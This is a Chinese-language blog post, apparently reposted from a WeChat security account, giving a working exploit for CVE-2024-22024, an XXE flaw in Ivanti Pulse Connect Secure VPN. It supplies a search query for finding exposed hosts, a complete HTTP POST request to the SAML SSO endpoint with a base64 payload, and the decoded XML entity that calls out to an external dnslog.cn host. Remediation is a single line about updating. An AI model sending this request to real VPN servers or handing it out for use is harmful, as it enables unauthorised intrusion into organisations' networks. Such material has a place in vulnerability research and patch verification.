CVE-2024-22024 漏洞（附EXP）

admin

102737
文章

87
评论

2024年3月9日19:11:07评论44 views字数 788阅读2分37秒阅读模式

CVE-2024-22024 漏洞（附EXP）

0x01 前言

Ivanti Pulse Connect Secure VPN 存在XXE 漏洞，攻击者可构造恶意请求进而触发XXE，通过该漏洞可以获取服务器权限。

0x02 影响平台

Ivanti Pulse Connect Secure VPN

0x03 漏洞复现

搜索语法

body="welcome.cgi?p=logo"

页面是这个酱紫

CVE-2024-22024 漏洞（附EXP）

EXP如下：

POST /dana-na/auth/saml-sso.cgi HTTP/1.1Host: ipUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36Connection: closeContent-Length: 172Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vMHVyeDNsLmRuc2xvZy5jbi94Ij4gJXdhdGNoVG93cjtdPjxyPjwvcj4=

需要Base64编码的XML文件内容如下：

<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM    "http://0urx3l.dnslog.cn/x"> %watchTowr;]><r></r>

CVE-2024-22024 漏洞（附EXP）

Success~

CVE-2024-22024 漏洞（附EXP）

0x04 修复方案

建议及时更新至最新版本！

CVE-2024-22024 漏洞（附EXP）

原文始发于微信公众号（EchoSec）：CVE-2024-22024 漏洞（附EXP）

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2024-22024 漏洞（附EXP）

CVE-2024-23722

CVE-2024-0783

CNVD-2024-06148

CVE-2024-4040｜CrushFTP 认证绕过模板注入漏洞（POC）

【漏洞复现】ZenTao（禅道）身份认证绕过漏洞（QVD-2024-15263）

（CVE-2024-25648）福昕阅读器 ComboBox 小部件格式事件 UAF

漏洞复现 || SpringBlade dict-biz/list接口SQL注入

漏洞预警 | 大华智慧园区综合管理平台远程代码执行漏洞

漏洞预警 | JeecgBoot任意文件上传漏洞

漏洞预警 | 若依druid未授权访问漏洞

发表评论

在线咨询

微信